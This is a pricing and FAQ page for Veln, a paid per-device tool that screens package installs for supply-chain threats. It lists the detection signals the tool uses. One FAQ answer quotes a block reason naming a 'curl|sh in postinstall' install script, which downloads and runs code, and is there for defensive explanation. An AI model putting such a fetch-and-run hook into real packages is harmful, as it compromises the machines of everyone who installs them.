Skip to content
← Home

Pricing

$9.99 per device. Forever.

One price, paid once. Full package verification across every package manager, on every machine — a lifetime license tied to the device. Add a machine, buy another device license.

Per developer machine

Veln

$9.99

per device · one-time · USD

Full supply-chain protection across every package manager, on every developer machine. One lifetime license per machine — no subscription, no renewals.

More machines? Buy another device license anytime — each one is a one-time $9.99 purchase you activate on the next machine. Buy one or several at once.
Get started →

One-time payment. Yours for life.

Every device license includes

  • npm, yarn, pnpm, bun — every install intercepted
  • pip, pip3, uv, pipx — every install intercepted
  • go, cargo, bundle, dotnet, mvn, gradle — install-time gate routing
  • OS-level install-script isolation (Linux Landlock, macOS sandbox-exec, Windows Job Object — see capabilities for the Windows network-isolation caveat)
  • OSV vulnerability lookups + npm publish-attestation checks
  • Maintainer-drift, dormant-revival, license-change, and dependency-confusion signals
  • Obfuscation, dynamic-eval, and packed-payload detection
  • Capability / permission-creep + telemetry, secret-exfil, and geo-targeting signals
  • SBOM export (CycloneDX & SPDX), policy-as-code rules, and VEX suppressions
  • Local Console with full per-package finding history

FAQ

Frequently asked questions

How does pricing work?

You pay $9.99 once per device — a lifetime license, no subscription. Ten machines is ten device licenses, $99.90 one time. There are no renewals and nothing to cancel.

What counts as a device?

One license covers one machine. If a developer uses two machines (a laptop and a desktop), that's two device licenses. Once a license is activated on a machine it is tied to that machine for life.

Can I buy more devices later?

Yes. Buy device licenses whenever you add machines — each new purchase grants another lifetime license you can activate on the next device. Buy one at a time or several at once.

Is it really lifetime?

Yes. Activation binds the license to that device permanently and the agent verifies it offline from then on — there are no reactivations, no expiry, and no recurring license checks. A license stays with the device it was activated on.

Does Veln send my code anywhere?

Veln does not transmit your source code, your project files, or your dependency list to the Veln backend. Verdicts are computed locally on your machine. After a one-time device activation the agent verifies your license offline — there is no recurring license call. Vulnerability and provenance lookups go to third parties (OSV / api.osv.dev for known CVEs, the npm registry for publish attestations) and contain only the (name, version) pair your package manager was about to install anyway.

Does it slow down my installs?

For packages already in the local fingerprint cache, the gate adds tens of milliseconds — typically under 50 ms per package on a warm cache. The first time a new (package, version) is seen, the gate downloads its tarball, hashes it, and runs the full signal pipeline; that takes the time the registry plus OSV plus your network would have taken anyway. After that first verification, subsequent installs hit the local cache.

What does Veln actually block?

Veln blocks packages whose combined trust score falls below the policy's block threshold. The score combines 20+ signals: known OSV vulnerabilities, registry/tarball repo-URL mismatch, dormant-revival, maintainer drift, license change, dependency-confusion, typosquat, install-script risk (download+execute, time-bombs, unicode tricks), obfuscation, dynamic eval, packed-payload binaries, file-tree drift versus a previously observed version, and cooling-window violations. A local threat-feed denylist (opt-in via `VELN_THREAT_DENYLIST_PATH`) is also wired in if you point it at a list you maintain. When something blocks, Veln names the exact signal code and detail (e.g. `static.npm_dep_lifecycle_script_critical: curl|sh in postinstall`).

What happens if Veln crashes mid-install?

If Veln's process dies, the byte stream to your package manager dies with it. The package manager sees a connection error and aborts. No partial package lands on disk.